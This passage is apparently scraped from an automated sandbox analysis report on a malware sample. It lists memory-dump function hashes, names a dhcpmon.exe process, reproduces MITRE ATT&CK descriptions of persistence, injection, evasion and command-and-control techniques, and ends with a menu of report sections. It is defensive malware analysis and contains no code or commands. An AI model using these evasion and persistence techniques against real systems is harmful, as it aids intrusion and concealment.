Instruction Fuzzy Hash: 6FF058353001108F8B059B3DD45892E37EBABC826031A40AAE40BCB361DF25DC02CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02A214D9, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd93206a546d84e82e5d6f414e3ef09a22989ea40cd8e6ce53cdce8bb0d8516a
Instruction ID: 5b810d506f9f4a9d2dd31942a3d2b1309e14e29d3983fdd4be352dcec68ca7ec
Opcode Fuzzy Hash: cd93206a546d84e82e5d6f414e3ef09a22989ea40cd8e6ce53cdce8bb0d8516a
Instruction Fuzzy Hash: 76F065353041509FC7155B3ED454A6A3BEAAFC921571940AAE807CB762DE71DC05C790

Uniqueness

Uniqueness Score: -1.00%

Function 02A20070, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf838147b9cae0d40bef9886f5ca505f088963ba28ae847e408ede17463fe49
Instruction ID: 0d651175656caa4cfcc5ef56d81fe3f4ee670e13cd0579d053db7c0657f32d7f
Opcode Fuzzy Hash: fdf838147b9cae0d40bef9886f5ca505f088963ba28ae847e408ede17463fe49
Instruction Fuzzy Hash: 2EE06D32604319AF8B04DFA9FC488EEBFAAEA84261B018067E50DD2210EF355645CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AD05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736324484.0000000002AD0000.00000040.00000040.sdmp, Offset: 02AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f67de918f8a4135ff293873f0271108d57a8a39d2947449b5ce782ee7705e05
Instruction ID: 8eed7f8da24a61022502056c82202d6bc49e5eef61d99da5d57f63d22feae64e
Opcode Fuzzy Hash: 2f67de918f8a4135ff293873f0271108d57a8a39d2947449b5ce782ee7705e05
Instruction Fuzzy Hash: 06E06DB6A407008B9650CF0AEC81462FB98EB84630B08C46BDC0D8B701D136F504CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 02A20D29, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876d3567d67edd350abbda4b10a151790ff2100804c7dc18a87142c340a8a120
Instruction ID: 49c350cb9e1bb788450e7e31318ebc0bf4fe7664db800a35bb801f1865a09293
Opcode Fuzzy Hash: 876d3567d67edd350abbda4b10a151790ff2100804c7dc18a87142c340a8a120
Instruction Fuzzy Hash: 69D02B2258A2901FCB0397B428210E93FB08C0725130840DBCC88DF252C6004E1BD791

Uniqueness

Uniqueness Score: -1.00%

Function 02A20C70, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d26297f1ff8b72260f1b81111c2fad3407d5f075063fcfaf2a34faa2e6c485b
Instruction ID: 165afc8119b0c2fa7525b91247e1a52af807882aa3996ad40e3c855cb7449638
Opcode Fuzzy Hash: 8d26297f1ff8b72260f1b81111c2fad3407d5f075063fcfaf2a34faa2e6c485b
Instruction Fuzzy Hash: 28E08670A102548FC714DF78F588B613BDAD749624F6540B5D40AD7797CF6A9C88C790

Uniqueness

Uniqueness Score: -1.00%

Function 02A214B5, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b936e78601e220beea659e83fc352037057a195e7d71e66a08284b54ab480cca
Instruction ID: 57ad8100139566ac6ea683061e301d2213a69983c15fecc9ce51228c610871fe
Opcode Fuzzy Hash: b936e78601e220beea659e83fc352037057a195e7d71e66a08284b54ab480cca
Instruction Fuzzy Hash: EEC04C7BF001454BDE1467A8B8441DCF752D7C4225B154162DA19C7240D93589298651

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 1320 Parent PID: 904 dhcpmon.exeCOMMON

Executed Functions

Function 00D000B9, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

UserRegisterWowHandlers.USER32 ref: 00D00115

Memory Dump Source

Source File: 00000022.00000002.743851155.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false

Similarity

API ID: HandlersRegisterUser
String ID:
API String ID: 3648561321-0
Opcode ID: b8785db21e493dc30d00b5ede659bc6a7c44cac34c25ec8e56da8ae80728633b
Instruction ID: 1d89d6af57272a2d0783a720656ea5bfbb2a8869ca2490ca105ff2f4d1c4990e
Opcode Fuzzy Hash: b8785db21e493dc30d00b5ede659bc6a7c44cac34c25ec8e56da8ae80728633b
Instruction Fuzzy Hash: 3C212A307053409FCB59AB7DC018B6D3FE6AF86305B2545A9D016CB7A6DE39CC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00D000C8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

UserRegisterWowHandlers.USER32 ref: 00D00115

Memory Dump Source

Source File: 00000022.00000002.743851155.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false

Similarity

API ID: HandlersRegisterUser
String ID:
API String ID: 3648561321-0
Opcode ID: c32043621d276bd634c76542585c2ffe6f5aa8419c4db22937f2afcb260ff507
Instruction ID: e00e04c9c0effafd2cee2ffe09f1e0f30cef2d694ddf11f2d0eee99d0bee5250
Opcode Fuzzy Hash: c32043621d276bd634c76542585c2ffe6f5aa8419c4db22937f2afcb260ff507
Instruction Fuzzy Hash: 84210C307003149FCB59AB7DC018B6D3AE6EF85305B2145B8D406CB7A6DE76DC45CB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Variant.Razy.845229.13077.24263

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations